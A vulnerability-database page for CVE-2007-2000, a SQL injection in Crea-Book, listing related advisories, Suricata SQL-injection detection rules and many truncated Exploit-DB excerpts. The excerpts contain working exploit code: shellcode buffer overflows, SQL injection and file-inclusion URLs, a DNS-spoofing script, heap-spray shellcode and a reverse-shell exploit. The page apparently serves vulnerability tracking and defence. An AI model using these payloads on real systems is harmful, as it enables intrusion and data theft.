CVE-2007-2000
published 2007-04-12CVE-2007-2000: Multiple SQL injection vulnerabilities in admin/admin.php in Crea-Book 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.6th percentile
Multiple SQL injection vulnerabilities in admin/admin.php in Crea-Book 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crea-book | crea-book | <= 1.0 | — |
| raphael_limbach | crea-book | <= 1.0 | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fgx3-c2gx-wcrm: Multiple SQL injection vulnerabilities in admin/admin
ghsa_unreviewed·2022-05-01
CVE-2007-2000 [HIGH] CWE-89 GHSA-fgx3-c2gx-wcrm: Multiple SQL injection vulnerabilities in admin/admin
Multiple SQL injection vulnerabilities in admin/admin.php in Crea-Book 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter.
GHSA
GHSA-f8hv-p37q-8vrh: Multiple SQL injection vulnerabilities in Crea-Book 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2314 [HIGH] GHSA-f8hv-p37q-8vrh: Multiple SQL injection vulnerabilities in Crea-Book 1
Multiple SQL injection vulnerabilities in Crea-Book 1.0, and possibly earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter to (a) configurer.php, (b) connect.php, (c) delete.php, (d) delete2.php, (e) index.php, (f) infos.php, (g) membres.php, (h) modif-infos.php, (i) modif-message.php, (j) modif.php, (k) uninstall.php, or (l) uninstall_table.php in admin/, different vectors than CVE-2007-2000. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: crash in jpc_qcx_getcompparms
vendor_redhat·2007-03-01·CVSS 4.3
CVE-2007-2721 [MEDIUM] jasper: crash in jpc_qcx_getcompparms
jasper: crash in jpc_qcx_getcompparms
The jpc_qcx_getcompparms function in jpc/jpc_cs.c for the JasPer JPEG-2000 library (libjasper) before 1.900 allows remote user-assisted attackers to cause a denial of service (crash) and possibly corrupt the heap via malformed image files, as originally demonstrated using imagemagick convert.
Statement: Not vulnerable. This issue did not affect versions of ghostscript as shipped with Red Hat Enterprise Linux 2.1, 3, 4 or 5 as they do not include a bundled JasPer library.
Citrix
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
vendor_citrix·2007-01-09·CVSS 6.0
CVE-2007-0108 [MEDIUM] CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles.
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004867; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tech
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004866; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004868; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004863; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Exploit-DB
IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
exploitdb·2009-09-14·CVSS 9.0
CVE-2007-2795 [CRITICAL] IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
---
/* Ipsbitch.cpp vs Ipswitch IMAP
* Tested on: Windows 2000 SP4
* Ref: CVE-2007-2795
*
* Author: Dominic Chell
* Found this half written on a VM so decided to finish it.
*
* Payload adds a local admin account USER=r00t PASS=r00tr00t!!
*
*/
#include "stdafx.h"
#include
#include
#include
#include
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP \n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}
// USER=r00t PASS=r00tr00t!!
// Bad Chars = '\x00\x0a\x0d\x0b\x09\x0c\x20'
// Encoded with shikata ga nai
char shellcode[] =
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef
Exploit-DB
Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
exploitdb·2008-01-08·CVSS 8.5
CVE-2007-3901 [HIGH] Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
---
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# https://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Win
Exploit-DB
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
exploitdb·2007-12-21·CVSS 9.0
CVE-2007-3039 [CRITICAL] Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
---
********************** merry christmas Sysadmins *****************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports fo
Exploit-DB
MRBS 1.2.x - 'view_entry.php' SQL Injection
exploitdb·2007-12-21
CVE-2007-6538 MRBS 1.2.x - 'view_entry.php' SQL Injection
MRBS 1.2.x - 'view_entry.php' SQL Injection
---
source: https://www.securityfocus.com/bid/26977/info
MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle.
http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
Exploit-DB
Snitz Forums 2000 - 'Active.asp' SQL Injection
exploitdb·2007-12-03
CVE-2007-6240 Snitz Forums 2000 - 'Active.asp' SQL Injection
Snitz Forums 2000 - 'Active.asp' SQL Injection
---
########################## WwW.BugReport.IR #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"
After login to your VICTIM forum, execute below script
~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
Query:
DefaultValues:
Submit:
~~~~~~~~~~~End HTML Exploit~~~~~~~
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
exploitdb·2007-11-11
CVE-2007-2217 Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
---
#!/usr/bin/perl
#
# Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
#
# Author: grabarz
#
# Note: This exploit is modified from Hong Gil-Dong, Jeon Woo-chi PoC
# (http://www.milw0rm.com/exploits/4584)
#
# Internet Explorer has standart ImageBase address and PE Win32 header
# is started at 0x00400000 in memory. So memory cell at the address
# 0x00400008 contains the short value 0x0004 and at the address
# 0x00400011 it contains the long value 0x00000000 in any case.
# I used these addresses for generating of TIFF-file that uses
# vulnerability and for controling of EIP.
#
# This exploit tested on:
# - Windows 2000 SP4 + IE5.01
# - Windows 2000 SP4 + IE5.5
# - Windows 2000 SP4 + IE6.0 SP1
#
# Credit: Hong G
Exploit-DB
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
exploitdb·2007-10-29
CVE-2007-2217 Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
---
/* MS07-055 Kodak Image Viewer TIF/TIFF Code Execution Proof Of Concept
by Hong Gil-Dong, Jeon Woo-chi
* Hwang-Hee(?~1542), Prime Minister in Korea
* Once upon a time, One servant of Hwang-Hee was arguing with another
* servant. they asked Hwang-Hee to judge who is right.
* Hwang-Hee listend their story, and said "Both are right".
* We tested this code on Windows 2000 SP4 Korean Edition.
* But if you change some parts of this code, you can also execute an
* arbitrary code in other systems.
* - Caution -
* First, execute the Kodak Image Viewer and then open the ms07-005.tif
* file. If you click the ms07-005.tif file directly in explorer,
* sometimes it causes not excution but just crash.
*/
#include
#define TIF_FILE "ms07-055
Exploit-DB
CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
exploitdb·2007-10-27
CVE-2007-5082 CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
---
#!/usr/bin/perl
#
# *
# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o
# * C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@o
# * C@@@@@@o .8@@@@@@. C@@@@@@o 8@@@@@@. @@@@@@O .@@o
# * C@@@@@ @@@@@@c C@@@@@ @@@@@@c C@@@@@c
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: @@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: 8@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: :@@@@@@ ::
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: c@@@@@@@Coo8@@@o
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: C@@@@@@@@@@@@o
# *
# * [0x00001010]
# *
# * Title: CA BrightStor HSM
# * Discovery: iDefense
# * Vulnerability Type: Remote Stack Overflow / DoS
# * Risk: High
# * TCP: 2000
# *
# * This body, this body holding me, be my reminder here that I am not alone.
# *
#
use IO::Socket;
$handshake
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
exploitdb·2007-09-12
CVE-2007-4814 Microsoft SQL Server - Distributed Management Objects Buffer Overflow
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
---
Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim ([email protected])
-->
// Heap Spray
// execute "calc.exe"
shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC08
Exploit-DB
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow
exploitdb·2007-09-03·CVSS 9.3
CVE-2007-2394 [CRITICAL] Apple QuickTime < 7.2 - SMIL Remote Integer Overflow
Apple QuickTime
SRC="available-sample.qtif"
QTSRC="poc.smil"
WIDTH="10" HEIGHT="10"
PLUGINSPAGE=" www.apple.com/quicktime/download"
TYPE="video/quicktime"
/>
PROOF OF CONCEPT
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes
####
$file = " poc.smil";
$padd = "x";
$cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
$tit_len = 223;
$auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH
"\n".
"\n".
" \n".
" \n".
" \n".
"\n".
"";
close(FH);
# milw0rm.com [2007-09-03]
Exploit-DB
Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
exploitdb·2007-07-20
CVE-2007-1675 Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
---
###########################################################################################
# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
###########################################################################################
# Vulnerable: IBM Lotus Domino & prdelka
#
# Exploitation steps:
# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
# 2) EAX reference our buffer from retaddr onward
# 3) we put pointer in ECX to a pointer referencing "call eax"
# 4) a small payload decrements eax and then jmp's into the eax buffer due
# to size limitations.
# 5) our larger payload is then executed.
#
# muts exploit would not work for us, his egghunt uses 0x2e which
Exploit-DB
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
exploitdb·2007-07-10
CVE-2007-3681 WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
---
/*
WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit
Affected software:
(*) WinPcap versions affected (Confirmed)
- WinPcap 4.0 and previous
(*) WinPcap fixed version (stable) : WinPcap 4.0.1
Note : There was an error in the previous advisory, which tells WinPcap
4.1 is affected, in fact WinPcap 4.1 is the beta version.
(*) Operating systems affected (Confirmed)
- Windows 2000 SP4 (Both server and workstation)
- Windows XP SP2
- Windows 2003 Server
- Windows Vista !!
Description:
It's a well known issue that WinPcap security model allows non-administrator
users to use its device driver. If they don't manually unload it after using
tools such as Wireshark (ethereal), which unfortunatelly oftenly happens, this
can
Exploit-DB
SAP DB 7.4 - WebTools Remote Overwrite (SEH)
exploitdb·2007-07-07
CVE-2007-3614 SAP DB 7.4 - WebTools Remote Overwrite (SEH)
SAP DB 7.4 - WebTools Remote Overwrite (SEH)
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : SAP DB 7.4 WebTools
* Site : http://www.sapdb.org
* Found by : NGSSoftware Insight Security Research
* ----------------------------------------
* Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit
* Exploit date : 07.07.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 ALL SP
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : This is the SEH overwrite realization of the vulnerability found by
* NGSSoftware Insight Security Research, it is trivial. We send a big amount
* of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
* byte we trigger an exception and our shellcode is executed.
* -
Exploit-DB
Microsoft Excel 2000/2003 - Sheet Name (PoC)
exploitdb·2007-06-27
CVE-2007-3490 Microsoft Excel 2000/2003 - Sheet Name (PoC)
Microsoft Excel 2000/2003 - Sheet Name (PoC)
---
Vuln Exposed by: ZhenHan.Liu
Team: Ph4nt0m Security Team
http://www.ph4nt0m.org
Tested on: Full Patched Excel 2003 Sp2, CN
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip)
# milw0rm.com [2007-06-27]
Exploit-DB
WebIf - 'OutConfig' Local File Inclusion
exploitdb·2007-06-18
CVE-2007-3266 WebIf - 'OutConfig' Local File Inclusion
WebIf - 'OutConfig' Local File Inclusion
---
source: https://www.securityfocus.com/bid/24516/info
WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue
Exploit-DB
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
exploitdb·2007-05-30
CVE-2007-2980 LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
---
2007/05/27
LeadTools Raster ISIS Object (LTRIS14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
buff = String(2000, "A")
test.DriverName = buff
here is a dump:
EAX 41414141
ECX 41414141
EDX 008CC338 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBX 008C0000
ESP 0348F994
EBP 0348FBB4
ESI 008CC330 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EDI 00000012
EIP 7C92142E ntdll.7C92142E
7C92
Exploit-DB
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
exploitdb·2007-05-23
CVE-2007-2903 Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
---
2007/05/23
Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
# milw0rm.com [2007-05-23]
Exploit-DB
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
exploitdb·2007-05-14
CVE-2007-2648 Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
---
2007/05/14
Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit
url: http://www.clevercomponents.com/home/news.asp
price: from $49.99 to $149.19
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
faultmon dump:
12:58:35.492 pid=0570 tid=07FC EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=41418282: ?? ??
Exploit-DB
GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
exploitdb·2007-05-09
CVE-2007-2356 GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
---
/*
:: Kristian Hermansen ::
Date: 20070509
Description: Gimp 2.2.14 RAS vuln, thanks to Marsu. This one is universal
download and exec using call esp in libgimpcolor-2.0-0.dll.
Vulnerable: Gimp 2.2.14
Tested: Gimp 2.2.14 on Windows Vista, XP, 2000
Compile: gcc -o netsniper-gimpu netsniper-gimpu.c
Usage: ./netsniper-gimpu http://tinyurl.com/32h99k ubuntu.ras
*/
#include
#include
#include
char RAS[]=
"\x59\xa6\x6a\x95\x00\x00\x01\xfd\x00\x00\x01\xb6\x00\x00\x00\x08"
"\x00\x03\x68\x94\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x03\x29"
"\x1b\xff\xbc\xef\x73\xd9\x13\x00\x70\xf0\xcc\x8d\x99\x50\xf1\xf7"
"\xac\x4d\xf0\xab\xe0\xec\xef\x2e\xe5\x8c\xef\xa6\x33\x8c\xc6\xfa"
"\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
